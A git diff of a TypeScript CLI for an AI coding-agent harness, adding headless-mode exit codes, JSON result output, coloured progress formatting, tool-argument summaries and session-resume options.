+}
+
 if (extensionsResult.errors.length > 0) {
   for (const err of extensionsResult.errors) {
-    const isSuperseded = err.error.includes("supersedes");
-    const prefix = isSuperseded ? "Extension conflict" : "Extension load error";
+    const isConflict = err.error.includes("supersedes") || err.error.includes("conflicts with");
+    const prefix = isConflict ? "Extension conflict" : "Extension load error";
     process.stderr.write(`[gsd] ${prefix}: ${err.error}\n`)
   }
 }
@@ -602,24 +753,39 @@ if (enabledModelPatterns && enabledModelPatterns.length > 0) {
   }
 }
 
-if (!process.stdin.isTTY) {
-  process.stderr.write('[gsd] Error: Interactive mode requires a terminal (TTY).\n')
+if (!process.stdin.isTTY || !process.stdout.isTTY) {
+  const missing = !process.stdin.isTTY && !process.stdout.isTTY
+    ? 'stdin and stdout are'
+    : !process.stdin.isTTY
+      ? 'stdin is'
+      : 'stdout is'
+  process.stderr.write(`[gsd] Error: Interactive mode requires a terminal (TTY) but ${missing} not a TTY.\n`)
   process.stderr.write('[gsd] Non-interactive alternatives:\n')
+  process.stderr.write('[gsd]   gsd auto                       Auto-mode (pipeable, no TUI)\n')
   process.stderr.write('[gsd]   gsd --print "your message"     Single-shot prompt\n')
   process.stderr.write('[gsd]   gsd --web [path]               Browser-only web mode\n')
   process.stderr.write('[gsd]   gsd --mode rpc                 JSON-RPC over stdin/stdout\n')
   process.stderr.write('[gsd]   gsd --mode mcp                 MCP server over stdin/stdout\n')
   process.stderr.write('[gsd]   gsd --mode text "message"      Text output mode\n')
+  process.stderr.write('[gsd]   gsd headless                   Auto-mode without TUI\n')
   process.exit(1)
 }
 
-// Welcome screen — shown on every fresh interactive session before TUI takes over
-{
+// Welcome screen — shown on every fresh interactive session before TUI takes over.
+// Skip when the first-run banner was already printed in loader.ts (prevents double banner).
+if (!process.env.GSD_FIRST_RUN_BANNER) {
   const { printWelcomeScreen } = await import('./welcome-screen.js')
+  let remoteChannel: string | undefined
+  try {
+    const { resolveRemoteConfig } = await import('./resources/extensions/remote-questions/config.js')
+    const rc = resolveRemoteConfig()
+    if (rc) remoteChannel = rc.channel
+  } catch { /* non-fatal */ }
   printWelcomeScreen({
     version: process.env.GSD_VERSION || '0.0.0',
     modelName: settingsManager.getDefaultModel() || undefined,
     provider: settingsManager.getDefaultProvider() || undefined,
+    remoteChannel,
   })
 }
 
diff --git a/src/headless-events.ts b/src/headless-events.ts
index c0ecd3ca8..190ac99a1 100644
--- a/src/headless-events.ts
+++ b/src/headless-events.ts
@@ -3,8 +3,50 @@
  *
  * Detects terminal notifications, blocked notifications, milestone-ready signals,
  * and classifies commands as quick (single-turn) vs long-running.
+ *
+ * Also defines exit code constants and the status→exit-code mapping function.
  */
 
+// ---------------------------------------------------------------------------
+// Exit Code Constants
+// ---------------------------------------------------------------------------
+
+export const EXIT_SUCCESS = 0
+export const EXIT_ERROR = 1
+export const EXIT_BLOCKED = 10
+export const EXIT_CANCELLED = 11
+
+/**
+ * Map a headless session status string to its standardized exit code.
+ *
+ *   success   → 0
+ *   complete  → 0
+ *   completed → 0
+ *   error     → 1
+ *   timeout   → 1
+ *   blocked   → 10
+ *   cancelled → 11
+ *
+ * Unknown statuses default to EXIT_ERROR (1).
+ */
+export function mapStatusToExitCode(status: string): number {
+  switch (status) {
+    case 'success':
+    case 'complete':
+    case 'completed':
+      return EXIT_SUCCESS
+    case 'error':
+    case 'timeout':
+      return EXIT_ERROR
+    case 'blocked':
+      return EXIT_BLOCKED
+    case 'cancelled':
+      return EXIT_CANCELLED
+    default:
+      return EXIT_ERROR
+  }
+}
+
 // ---------------------------------------------------------------------------
 // Completion Detection
 // ---------------------------------------------------------------------------
diff --git a/src/headless-query.ts b/src/headless-query.ts
index b3faf9a8c..cc7c134c3 100644
--- a/src/headless-query.ts
+++ b/src/headless-query.ts
@@ -16,12 +16,22 @@
 
 import { createJiti } from '@mariozechner/jiti'
 import { fileURLToPath } from 'node:url'
+import { join } from 'node:path'
+import { homedir } from 'node:os'
 import type { GSDState } from './resources/extensions/gsd/types.js'
 import { resolveBundledSourceResource } from './bundled-resource-path.js'
 
 const jiti = createJiti(fileURLToPath(import.meta.url), { interopDefault: true, debug: false })
+// Resolve extensions from the synced agent directory so headless-query
+// loads the same extension copy as interactive/auto modes (#3471).
+// Falls back to bundled source for source-tree dev workflows.
+const agentExtensionsDir = join(process.env.GSD_AGENT_DIR || join(homedir(), '.gsd', 'agent'), 'extensions', 'gsd')
+const { existsSync } = await import('node:fs')
+const useAgentDir = existsSync(join(agentExtensionsDir, 'state.ts'))
 const gsdExtensionPath = (...segments: string[]) =>
-  resolveBundledSourceResource(import.meta.url, 'extensions', 'gsd', ...segments)
+  useAgentDir
+    ? join(agentExtensionsDir, ...segments)
+    : resolveBundledSourceResource(import.meta.url, 'extensions', 'gsd', ...segments)
 
 async function loadExtensionModules() {
   const stateModule = await jiti.import(gsdExtensionPath('state.ts'), {}) as any
@@ -71,7 +81,7 @@ export async function handleQuery(basePath: string): Promise<QueryResult> {
 
   // Derive next dispatch action
   let next: QuerySnapshot['next']
-  if (!state.activeMilestone) {
+  if (!state.activeMilestone?.id) {
     next = {
       action: 'stop',
       reason: state.phase === 'complete' ? 'All milestones complete.' : state.nextAction,
diff --git a/src/headless-types.ts b/src/headless-types.ts
new file mode 100644
index 000000000..6a4650ed9
--- /dev/null
+++ b/src/headless-types.ts
@@ -0,0 +1,39 @@
+/**
+ * Headless Types — shared types for the headless orchestrator surface.
+ *
+ * Contains the structured result type emitted in --output-format json mode
+ * and the output format discriminator.
+ */
+
+// ---------------------------------------------------------------------------
+// Output Format
+// ---------------------------------------------------------------------------
+
+export type OutputFormat = 'text' | 'json' | 'stream-json'
+
+export const VALID_OUTPUT_FORMATS: ReadonlySet<string> = new Set(['text', 'json', 'stream-json'])
+
+// ---------------------------------------------------------------------------
+// Structured JSON Result
+// ---------------------------------------------------------------------------
+
+export interface HeadlessJsonResult {
+  status: 'success' | 'error' | 'blocked' | 'cancelled' | 'timeout'
+  exitCode: number
+  sessionId?: string
+  duration: number
+  cost: {
+    total: number
+    input_tokens: number
+    output_tokens: number
+    cache_read_tokens: number
+    cache_write_tokens: number
+  }
+  toolCalls: number
+  events: number
+  milestone?: string
+  phase?: string
+  nextAction?: string
+  artifacts?: string[]
+  commits?: string[]
+}
diff --git a/src/headless-ui.ts b/src/headless-ui.ts
index 5b7453aac..6200bb92b 100644
--- a/src/headless-ui.ts
+++ b/src/headless-ui.ts
@@ -8,7 +8,7 @@
 
 import type { Readable } from 'node:stream'
 
-import { RpcClient, attachJsonlLineReader, serializeJsonLine } from '@gsd/pi-coding-agent'
+import { RpcClient, attachJsonlLineReader } from '@gsd/pi-coding-agent'
 
 // ---------------------------------------------------------------------------
 // Types
@@ -28,84 +28,395 @@ interface ExtensionUIRequest {
 
 export type { ExtensionUIRequest }
 
+/** Context passed alongside an event for richer formatting. */
+export interface ProgressContext {
+  verbose: boolean
+  toolDuration?: number           // ms, for tool_execution_end
+  lastCost?: { costUsd: number; inputTokens: number; outputTokens: number }
+  thinkingPreview?: string        // accumulated LLM text to show before tool calls
+  isError?: boolean               // tool execution ended with an error
+}
+
+// ---------------------------------------------------------------------------
+// ANSI Color Helpers
+// ---------------------------------------------------------------------------
+
+const _c = {
+  reset: '\x1b[0m',
+  bold: '\x1b[1m',
+  dim: '\x1b[2m',
+  italic: '\x1b[3m',
+  red: '\x1b[31m',
+  green: '\x1b[32m',
+  yellow: '\x1b[33m',
+  cyan: '\x1b[36m',
+  gray: '\x1b[90m',
+}
+
+/** Build a no-op color map (all codes empty). */
+function noColor(): typeof _c {
+  const nc: Record<string, string> = {}
+  for (const k of Object.keys(_c)) nc[k] = ''
+  return nc as typeof _c
+}
+
+const colorsDisabled = !!process.env['NO_COLOR'] || !process.stderr.isTTY
+const c: typeof _c = colorsDisabled ? noColor() : _c
+
+// ---------------------------------------------------------------------------
+// Tool-Arg Summarizer
+// ---------------------------------------------------------------------------
+
+/**
+ * Produce a short human-readable summary of tool arguments.
+ * Returns a string like "path/to/file.ts" or "grep pattern *.ts" — never the
+ * full JSON blob.
+ */
+export function summarizeToolArgs(toolName: unknown, toolInput: unknown): string {
+  const name = String(toolName ?? '')
+  const input = (toolInput && typeof toolInput === 'object') ? toolInput as Record<string, unknown> : {}
+
+  // Helper: extract file path from either 'path' or 'file_path' (tools use both)
+  const filePath = (): string => shortPath(input.path ?? input.file_path) || ''
+
+  switch (name) {
+    case 'Read':
+    case 'read':
+      return filePath()
+    case 'Write':
+    case 'write':
+      return filePath()
+    case 'Edit':
+    case 'edit':
+      return filePath()
+    case 'hashline_edit':
+      return filePath()
+    case 'Bash':
+    case 'bash': {
+      const cmd = String(input.command ?? '')
+      return cmd.length > 80 ? cmd.slice(0, 77) + '...' : cmd
+    }
+    case 'async_bash': {
+      const cmd = String(input.command ?? '')
+      return cmd.length > 80 ? cmd.slice(0, 77) + '...' : cmd
+    }
+    case 'await_job': {
+      const jobs = input.jobs
+      if (Array.isArray(jobs) && jobs.length > 0) return jobs.join(', ')
+      return ''
+    }
+    case 'cancel_job':
+      return String(input.job_id ?? '')
+    case 'Glob':
+    case 'glob':
+      return String(input.pattern ?? '')
+    case 'find': {
+      const pat = String(input.pattern ?? '')
+      const p = shortPath(input.path)
+      return p ? `${pat} in ${p}` : pat
+    }
+    case 'Grep':
+    case 'grep':
+    case 'Search':
+    case 'search': {
+      const pat = String(input.pattern ?? '')
+      const g = input.glob ? ` ${input.glob}` : ''
+      return `${pat}${g}`
+    }
+    case 'ls':
+      return shortPath(input.path) || ''
+    case 'lsp': {
+      const action = String(input.action ?? '')
+      const file = shortPath(input.file)
+      const sym = input.symbol ? ` ${input.symbol}` : ''
+      return file ? `${action} ${file}${sym}` : action
+    }
+    case 'Task':
+    case 'task': {
+      const desc = String(input.description ?? input.prompt ?? '')
+      return desc.length > 60 ? desc.slice(0, 57) + '...' : desc
+    }
+    case 'subagent': {
+      const agent = String(input.agent ?? '')
+      const t = String(input.task ?? '')
+      const summary = t.length > 50 ? t.slice(0, 47) + '...' : t
+      return agent ? `${agent}: ${summary}` : summary
+    }
+    case 'browser_navigate':
+      return String(input.url ?? '')
+    default: {
+      // GSD tools: show milestone/slice/task IDs when present
+      if (name.startsWith('gsd_')) {
+        return summarizeGsdTool(name, input)
+      }
+      // Fallback: show first string-valued key up to 60 chars
+      for (const v of Object.values(input)) {
+        if (typeof v === 'string' && v.length > 0) {
+          return v.length > 60 ? v.slice(0, 57) + '...' : v
+        }
+      }
+      return ''
+    }
+  }
+}
+
+/** Summarize GSD extension tool args into a compact identifier string. */
+function summarizeGsdTool(name: string, input: Record<string, unknown>): string {
+  const parts: string[] = []
+  if (input.milestoneId) parts.push(String(input.milestoneId))
+  if (input.sliceId) parts.push(String(input.sliceId))
+  if (input.taskId) parts.push(String(input.taskId))
+  if (parts.length > 0) {
+    const id = parts.join('/')
+    // For completion tools, add the one-liner if present
+    if (name.includes('complete') && typeof input.oneLiner === 'string') {
+      const ol = input.oneLiner.length > 50 ? input.oneLiner.slice(0, 47) + '...' : input.oneLiner
+      return `${id} ${ol}`
+    }
+    return id
+  }
+  // Fallback for GSD tools without IDs (e.g. gsd_decision_save)
+  if (input.decision) {
+    const d = String(input.decision)
+    return d.length > 60 ? d.slice(0, 57) + '...' : d
+  }
+  return ''
+}
+
+function shortPath(p: unknown): string {
+  if (typeof p !== 'string') return ''
+  // Strip common CWD prefix to save space
+  const cwd = process.cwd()
+  if (p.startsWith(cwd + '/')) return p.slice(cwd.length + 1)
+  // Strip /Users/*/Developer/ prefix
+  return p.replace(/^\/Users\/[^/]+\/Developer\//, '')
+}
+
+// ---------------------------------------------------------------------------
+// Format Duration
+// ---------------------------------------------------------------------------
+
+function formatDuration(ms: number): string {
+  if (ms < 1000) return `${ms}ms`
+  const s = (ms / 1000).toFixed(1)
+  return `${s}s`
+}
+
 // ---------------------------------------------------------------------------
 // Extension UI Auto-Responder
 // ---------------------------------------------------------------------------
 
 export function handleExtensionUIRequest(
   event: ExtensionUIRequest,
-  writeToStdin: (data: string) => void,
+  client: RpcClient,
 ): void {
   const { id, method } = event
-  let response: Record<string, unknown>
 
   switch (method) {
-    case 'select':
-      response = { type: 'extension_ui_response', id, value: event.options?.[0] ?? '' }
+    case 'select': {
+      // Lock-guard prompts list "View status" first, but headless needs "Force start"
+      // to proceed. Detect by title and pick the force option.
+      const title = String(event.title ?? '')
+      let selected = event.options?.[0] ?? ''
+      if (title.includes('Auto-mode is running') && event.options) {
+        const forceOption = event.options.find(o => o.toLowerCase().includes('force start'))
+        if (forceOption) selected = forceOption
+      }
+      client.sendUIResponse(id, { value: selected })
       break
+    }
     case 'confirm':
-      response = { type: 'extension_ui_response', id, confirmed: true }
+      client.sendUIResponse(id, { confirmed: true })
       break
     case 'input':
-      response = { type: 'extension_ui_response', id, value: '' }
+      client.sendUIResponse(id, { value: '' })
       break
     case 'editor':
-      response = { type: 'extension_ui_response', id, value: event.prefill ?? '' }
+      client.sendUIResponse(id, { value: event.prefill ?? '' })
       break
     case 'notify':
     case 'setStatus':
     case 'setWidget':
     case 'setTitle':
     case 'set_editor_text':
-      response = { type: 'extension_ui_response', id, value: '' }
+      client.sendUIResponse(id, { value: '' })
       break
     default:
       process.stderr.write(`[headless] Warning: unknown extension_ui_request method "${method}", cancelling\n`)
-      response = { type: 'extension_ui_response', id, cancelled: true }
+      client.sendUIResponse(id, { cancelled: true })
       break
   }
-
-  writeToStdin(serializeJsonLine(response))
 }
 
 // ---------------------------------------------------------------------------
 // Progress Formatter
 // ---------------------------------------------------------------------------
 
-export function formatProgress(event: Record<string, unknown>, verbose: boolean): string | null {
+export function formatProgress(event: Record<string, unknown>, ctx: ProgressContext): string | null {
   const type = String(event.type ?? '')
 
+  // Emit accumulated thinking preview before tool calls
+  if (ctx.thinkingPreview) {
+    // thinkingPreview is handled by the caller in headless.ts — it prepends
+    // the thinking line before the current event's line. We return the thinking
+    // line as a prefix joined with newline.
+  }
+
   switch (type) {
-    case 'tool_execution_start':
-      if (verbose) return `  [tool]    ${event.toolName ?? 'unknown'}`
-      return null
+    case 'tool_execution_start': {
+      if (!ctx.verbose) return null
+      const name = String(event.toolName ?? 'unknown')
+      const args = summarizeToolArgs(event.toolName, event.args)
+      const argStr = args ? ` ${c.dim}${args}${c.reset}` : ''
+      return `  ${c.dim}[tool]${c.reset}    ${name}${argStr}`
+    }
+
+    case 'tool_execution_end': {
+      if (!ctx.verbose) return null
+      const name = String(event.toolName ?? 'unknown')
+      const durationStr = ctx.toolDuration != null ? ` ${c.dim}${formatDuration(ctx.toolDuration)}${c.reset}` : ''
+      if (ctx.isError) {
+        return `  ${c.red}[tool]    ${name} error${c.reset}${durationStr}`
+      }
+      return `  ${c.dim}[tool]    ${name} done${c.reset}${durationStr}`
+    }
 
     case 'agent_start':
-      return '[agent]   Session started'
+      return `${c.dim}[agent]   Session started${c.reset}`
 
-    case 'agent_end':
-      return '[agent]   Session ended'
+    case 'agent_end': {
+      let line = `${c.dim}[agent]   Session ended${c.reset}`
+      if (ctx.lastCost) {
+        const cost = `$${ctx.lastCost.costUsd.toFixed(4)}`
+        const tokens = `${ctx.lastCost.inputTokens + ctx.lastCost.outputTokens} tokens`
+        line += ` ${c.dim}(${cost}, ${tokens})${c.reset}`
+      }
+      return line
+    }
 
-    case 'extension_ui_request':
-      if (event.method === 'notify') {
-        return `[gsd]     ${event.message ?? ''}`
+    case 'extension_ui_request': {
+      const method = String(event.method ?? '')
+
+      if (method === 'notify') {
+        const msg = String(event.message ?? '')
+        if (!msg) return null
+        // Bold important notifications
+        const isImportant = /^(committed:|verification gate:|milestone|blocked:)/i.test(msg)
+        return isImportant
+          ? `${c.bold}[gsd]     ${msg}${c.reset}`
+          : `[gsd]     ${msg}`
       }
-      if (event.method === 'setStatus') {
-        return `[status]  ${event.message ?? ''}`
+
+      if (method === 'setStatus') {
+        // Parse statusKey for phase transitions
+        const statusKey = String(event.statusKey ?? '')
+        const msg = String(event.message ?? '')
+        if (!statusKey && !msg) return null  // suppress empty status lines
+        // Show meaningful phase transitions
+        if (statusKey) {
+          const label = parsePhaseLabel(statusKey, msg)
+          if (label) return `${c.cyan}[phase]   ${label}${c.reset}`
+        }
+        // Fallback: show message if non-empty
+        if (msg) return `${c.cyan}[phase]   ${msg}${c.reset}`
+        return null
       }
+
       return null
+    }
 
     default:
       return null
   }
 }
 
+/**
+ * Format a thinking preview line from accumulated LLM text deltas.
+ * Used as a fallback when streaming is not enabled — shows a truncated one-liner.
+ */
+export function formatThinkingLine(text: string): string {
+  const trimmed = text.replace(/\s+/g, ' ').trim()
+  const truncated = trimmed.length > 120 ? trimmed.slice(0, 117) + '...' : trimmed
+  return `${c.dim}${c.italic}[thinking] ${truncated}${c.reset}`
+}
+
+// ---------------------------------------------------------------------------
+// Streaming Text / Thinking Formatters
+// ---------------------------------------------------------------------------
+
+/**
+ * Format a text_start marker — printed once when the assistant begins a text block.
+ */
+export function formatTextStart(): string {
+  return `${c.dim}[text]${c.reset}`
+}
+
+/**
+ * Format a text_end marker — printed after the last text_delta.
+ */
+export function formatTextEnd(): string {
+  return '' // empty — newline handled by caller
+}
+
+/**
+ * Format a thinking_start marker.
+ */
+export function formatThinkingStart(): string {
+  return `${c.dim}${c.italic}[thinking]${c.reset}`
+}
+
+/**
+ * Format a thinking_end marker.
+ */
+export function formatThinkingEnd(): string {
+  return '' // empty — newline handled by caller
+}
+
+/**
+ * Format a cost line (used for periodic cost updates in verbose mode).
+ */
+export function formatCostLine(costUsd: number, inputTokens: number, outputTokens: number): string {
+  return `${c.dim}[cost]    $${costUsd.toFixed(4)} (${inputTokens + outputTokens} tokens)${c.reset}`
+}
+
+// ---------------------------------------------------------------------------
+// Phase Label Parser
+// ---------------------------------------------------------------------------
+
+/**
+ * Parse a statusKey into a human-readable phase label.
+ * statusKey format varies but common patterns:
+ *   "milestone:M1", "slice:S1.1", "task:T1.1.1", "phase:discuss", etc.
+ */
+function parsePhaseLabel(statusKey: string, message: string): string | null {
+  // Direct phase/milestone/slice/task keys
+  const parts = statusKey.split(':')
+  if (parts.length >= 2) {
+    const [kind, value] = parts
+    switch (kind.toLowerCase()) {
+      case 'milestone':
+        return `Milestone ${value}${message ? ' -- ' + message : ''}`
+      case 'slice':
+        return `Slice ${value}${message ? ' -- ' + message : ''}`
+      case 'task':
+        return `Task ${value}${message ? ' -- ' + message : ''}`
+      case 'phase':
+        return `Phase: ${value}${message ? ' -- ' + message : ''}`
+      default:
+        return `${kind}: ${value}${message ? ' -- ' + message : ''}`
+    }
+  }
+
+  // Single-word status keys with a message
+  if (message) return `${statusKey}: ${message}`
+  return statusKey || null
+}
+
 // ---------------------------------------------------------------------------
 // Supervised Stdin Reader
 // ---------------------------------------------------------------------------
 
 export function startSupervisedStdinReader(
-  stdinWriter: (data: string) => void,
   client: RpcClient,
   onResponse: (id: string) => void,
 ): () => void {
@@ -121,12 +432,17 @@ export function startSupervisedStdinReader(
     const type = String(msg.type ?? '')
 
     switch (type) {
-      case 'extension_ui_response':
-        stdinWriter(line + '\n')
-        if (typeof msg.id === 'string') {
-          onResponse(msg.id)
+      case 'extension_ui_response': {
+        const id = String(msg.id ?? '')
+        const value = msg.value !== undefined ? String(msg.value) : undefined
+        const confirmed = typeof msg.confirmed === 'boolean' ? msg.confirmed : undefined
+        const cancelled = typeof msg.cancelled === 'boolean' ? msg.cancelled : undefined
+        client.sendUIResponse(id, { value, confirmed, cancelled })
+        if (id) {
+          onResponse(id)
         }
         break
+      }
       case 'prompt':
         client.prompt(String(msg.message ?? ''))
         break
diff --git a/src/headless.ts b/src/headless.ts
index b14922271..cd0d86124 100644
--- a/src/headless.ts
+++ b/src/headless.ts
@@ -6,9 +6,10 @@
  * progress to stderr.
  *
  * Exit codes:
- *   0 — complete (command finished successfully)
- *   1 — error or timeout
- *   2 — blocked (command reported a blocker)
+ *   0  — complete (command finished successfully)
+ *   1  — error or timeout
+ *   10 — blocked (command reported a blocker)
+ *   11 — cancelled (SIGINT/SIGTERM received)
  */
 
 import { existsSync, mkdirSync, writeFileSync } from 'node:fs'
@@ -16,7 +17,9 @@ import { join } from 'node:path'
 import { resolve } from 'node:path'
 import { ChildProcess } from 'node:child_process'
 
-import { RpcClient } from '@gsd/pi-coding-agent'
+import { RpcClient, SessionManager } from '@gsd/pi-coding-agent'
+import type { SessionInfo } from '@gsd/pi-coding-agent'
+import { getProjectSessionsDir } from './project-sessions.js'
 import { loadAndValidateAnswerFile, AnswerInjector } from './headless-answers.js'
 
 import {
@@ -27,14 +30,27 @@ import {
   FIRE_AND_FORGET_METHODS,
   IDLE_TIMEOUT_MS,
   NEW_MILESTONE_IDLE_TIMEOUT_MS,
+  EXIT_SUCCESS,
+  EXIT_ERROR,
+  EXIT_BLOCKED,
+  EXIT_CANCELLED,
+  mapStatusToExitCode,
 } from './headless-events.js'
 
+import type { OutputFormat, HeadlessJsonResult } from './headless-types.js'
+import { VALID_OUTPUT_FORMATS } from './headless-types.js'
+
 import {
   handleExtensionUIRequest,
   formatProgress,
+  formatThinkingLine,
+  formatTextStart,
+  formatTextEnd,
+  formatThinkingStart,
+  formatThinkingEnd,
   startSupervisedStdinReader,
 } from './headless-ui.js'
-import type { ExtensionUIRequest } from './headless-ui.js'
+import type { ExtensionUIRequest, ProgressContext } from './headless-ui.js'
 
 import {
   loadContext,
@@ -48,6 +64,7 @@ import {
 export interface HeadlessOptions {
   timeout: number
   json: boolean
+  outputFormat: OutputFormat
   model?: string
   command: string
   commandArgs: string[]
@@ -60,6 +77,8 @@ export interface HeadlessOptions {
   responseTimeout?: number // timeout for orchestrator response (default 30000ms)
   answers?: string       // path to answers JSON file
   eventFilter?: Set<string>  // filter JSONL output to specific event types
+  resumeSession?: string // session ID to resume (--resume <id>)
+  bare?: boolean         // --bare: suppress CLAUDE.md/AGENTS.md, user skills, project preferences
 }
 
 interface TrackedEvent {
@@ -68,6 +87,39 @@ interface TrackedEvent {
   detail?: string
 }
 
+// ---------------------------------------------------------------------------
+// Resume Session Resolution
+// ---------------------------------------------------------------------------
+
+export interface ResumeSessionResult {
+  session?: SessionInfo
+  error?: string
+}
+
+/**
+ * Resolve a session prefix to a single session.
+ * Exact id match is preferred over prefix match.
+ * Returns `{ session }` on unique match or `{ error }` on 0/ambiguous matches.
+ */
+export function resolveResumeSession(sessions: SessionInfo[], prefix: string): ResumeSessionResult {
+  // Exact match takes priority
+  const exact = sessions.find(s => s.id === prefix)
+  if (exact) {
+    return { session: exact }
+  }
+
+  // Prefix match
+  const matches = sessions.filter(s => s.id.startsWith(prefix))
+  if (matches.length === 0) {
+    return { error: `No session matching '${prefix}' found` }
+  }
+  if (matches.length > 1) {
+    const list = matches.map(s => `  ${s.id}`).join('\n')
+    return { error: `Ambiguous session prefix '${prefix}' matches ${matches.length} sessions:\n${list}` }
+  }
+  return { session: matches[0] }
+}
+
 // ---------------------------------------------------------------------------
 // CLI Argument Parser
 // ---------------------------------------------------------------------------
@@ -76,26 +128,37 @@ export function parseHeadlessArgs(argv: string[]): HeadlessOptions {
   const options: HeadlessOptions = {
     timeout: 300_000,
     json: false,
+    outputFormat: 'text',
     command: 'auto',
     commandArgs: [],
   }
 
   const args = argv.slice(2)
-  let positionalStarted = false
 
   for (let i = 0; i < args.length; i++) {
     const arg = args[i]
     if (arg === 'headless') continue
 
-    if (!positionalStarted && arg.startsWith('--')) {
+    if (arg.startsWith('--')) {
       if (arg === '--timeout' && i + 1 < args.length) {
         options.timeout = parseInt(args[++i], 10)
-        if (Number.isNaN(options.timeout) || options.timeout <= 0) {
-          process.stderr.write('[headless] Error: --timeout must be a positive integer (milliseconds)\n')
+        if (Number.isNaN(options.timeout) || options.timeout < 0) {
+          process.stderr.write('[headless] Error: --timeout must be a non-negative integer (milliseconds, 0 to disable)\n')
           process.exit(1)
         }
       } else if (arg === '--json') {
         options.json = true
+        options.outputFormat = 'stream-json'
+      } else if (arg === '--output-format' && i + 1 < args.length) {
+        const fmt = args[++i]
+        if (!VALID_OUTPUT_FORMATS.has(fmt)) {
+          process.stderr.write(`[headless] Error: --output-format must be one of: text, json, stream-json (got '${fmt}')\n`)
+          process.exit(1)
+        }
+        options.outputFormat = fmt as OutputFormat
+        if (fmt === 'stream-json' || fmt === 'json') {
+          options.json = true
+        }
       } else if (arg === '--model' && i + 1 < args.length) {
         // --model can also be passed from the main CLI; headless-specific takes precedence
         options.model = args[++i]
@@ -118,18 +181,27 @@ export function parseHeadlessArgs(argv: string[]): HeadlessOptions {
       } else if (arg === '--events' && i + 1 < args.length) {
         options.eventFilter = new Set(args[++i].split(','))
         options.json = true  // --events implies --json
+        if (options.outputFormat === 'text') {
+          options.outputFormat = 'stream-json'
+        }
       } else if (arg === '--supervised') {
         options.supervised = true
         options.json = true  // supervised implies json
+        if (options.outputFormat === 'text') {
+          options.outputFormat = 'stream-json'
+        }
       } else if (arg === '--response-timeout' && i + 1 < args.length) {
         options.responseTimeout = parseInt(args[++i], 10)
         if (Number.isNaN(options.responseTimeout) || options.responseTimeout <= 0) {
           process.stderr.write('[headless] Error: --response-timeout must be a positive integer (milliseconds)\n')
           process.exit(1)
         }
+      } else if (arg === '--resume' && i + 1 < args.length) {
+        options.resumeSession = args[++i]
+      } else if (arg === '--bare') {
+        options.bare = true
       }
-    } else if (!positionalStarted) {
-      positionalStarted = true
+    } else if (options.command === 'auto') {
       options.command = arg
     } else {
       options.commandArgs.push(arg)
@@ -151,7 +223,7 @@ export async function runHeadless(options: HeadlessOptions): Promise<void> {
     const result = await runHeadlessOnce(options, restartCount)
 
     // Success or blocked — exit normally
-    if (result.exitCode === 0 || result.exitCode === 2) {
+    if (result.exitCode === EXIT_SUCCESS || result.exitCode === EXIT_BLOCKED) {
       process.exit(result.exitCode)
     }
 
@@ -183,6 +255,17 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
     options.timeout = 600_000 // 10 minutes
   }
 
+  // auto-mode sessions are long-running (minutes to hours) with their own internal
+  // per-unit timeout via auto-supervisor. Disable the overall timeout unless the
+  // user explicitly set --timeout.
+  const isAutoMode = options.command === 'auto'
+  // discuss and plan are multi-turn: they involve multiple question rounds,
+  // codebase scanning, and artifact writing before the workflow completes (#3547).
+  const isMultiTurnCommand = options.command === 'auto' || options.command === 'next' || options.command === 'discuss' || options.command === 'plan'
+  if (isAutoMode && options.timeout === 300_000) {
+    options.timeout = 0
+  }
+
   // Supervised mode cannot share stdin with --context -
   if (options.supervised && options.context === '-') {
     process.stderr.write('[headless] Error: --supervised cannot be used with --context - (both require stdin)\n')
@@ -267,6 +350,12 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
   if (injector) {
     clientOptions.env = injector.getSecretEnvVars()
   }
+  // Signal headless mode to the GSD extension (skips UAT human pause, etc.)
+  clientOptions.env = { ...(clientOptions.env as Record<string, string> || {}), GSD_HEADLESS: '1' }
+  // Propagate --bare to the child process
+  if (options.bare) {
+    clientOptions.args = [...((clientOptions.args as string[]) || []), '--bare']
+  }
 
   const client = new RpcClient(clientOptions)
 
@@ -279,6 +368,48 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
   let milestoneReady = false  // tracks "Milestone X ready." for auto-chaining
   const recentEvents: TrackedEvent[] = []
 
+  // JSON batch mode: cost aggregation (cumulative-max pattern per K004)
+  let cumulativeCostUsd = 0
+  let cumulativeInputTokens = 0
+  let cumulativeOutputTokens = 0
+  let cumulativeCacheReadTokens = 0
+  let cumulativeCacheWriteTokens = 0
+  let lastSessionId: string | undefined
+
+  // Verbose text-mode state
+  const toolStartTimes = new Map<string, number>()
+  let lastCostData: { costUsd: number; inputTokens: number; outputTokens: number } | undefined
+  let thinkingBuffer = ''
+  // Streaming state: tracks whether we're inside a text or thinking block
+  let inTextBlock = false
+  let inThinkingBlock = false
+
+  // Emit HeadlessJsonResult to stdout for --output-format json batch mode
+  function emitBatchJsonResult(): void {
+    if (options.outputFormat !== 'json') return
+    const duration = Date.now() - startTime
+    const status: HeadlessJsonResult['status'] = blocked ? 'blocked'
+      : exitCode === EXIT_CANCELLED ? 'cancelled'
+      : exitCode === EXIT_ERROR ? (totalEvents === 0 ? 'error' : 'timeout')
+      : 'success'
+    const result: HeadlessJsonResult = {
+      status,
+      exitCode,
+      sessionId: lastSessionId,
+      duration,
+      cost: {
+        total: cumulativeCostUsd,
+        input_tokens: cumulativeInputTokens,
+        output_tokens: cumulativeOutputTokens,
+        cache_read_tokens: cumulativeCacheReadTokens,
+        cache_write_tokens: cumulativeCacheWriteTokens,
+      },
+      toolCalls: toolCallCount,
+      events: totalEvents,
+    }
+    process.stdout.write(JSON.stringify(result) + '\n')
+  }
+
   function trackEvent(event: Record<string, unknown>): void {
     totalEvents++
     const type = String(event.type ?? 'unknown')
@@ -299,8 +430,11 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
     if (recentEvents.length > 20) recentEvents.shift()
   }
 
-  // Stdin writer for sending extension_ui_response to child
-  let stdinWriter: ((data: string) => void) | null = null
+  // Client started flag — replaces old stdinWriter null-check
+  let clientStarted = false
+  // Adapter for AnswerInjector — wraps client.sendUIResponse in a writeToStdin-compatible callback
+  // Initialized after client.start(); events won't fire before then
+  let injectorStdinAdapter: (data: string) => void = () => {}
 
   // Supervised mode state
   const pendingResponseTimers = new Map<string, ReturnType<typeof setTimeout>>()
@@ -337,12 +471,14 @@ async function runHeadlessOnce(options: HeadlessOptions, restartCount: number):
   // Precompute supervised response timeout
   const responseTimeout = options.responseTimeout ?? 30_000
 
-  // Overall timeout
-  const timeoutTimer = setTimeout(() => {
-    process.stderr.write(`[headless] Timeout after ${options.timeout / 1000}s\n`)
-    exitCode = 1
